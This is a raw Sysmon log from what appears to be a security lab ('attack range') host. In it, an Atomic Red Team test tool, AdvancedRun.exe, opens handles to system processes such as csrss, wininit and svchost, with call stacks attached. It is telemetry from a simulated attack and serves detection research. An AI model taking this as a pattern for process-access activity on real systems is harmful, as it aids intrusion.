17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983026Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983025Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983024Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983023Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983022Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983021Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983020Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003983019Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003983018Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983017Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983016Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983015Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983014Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983013Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983012Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 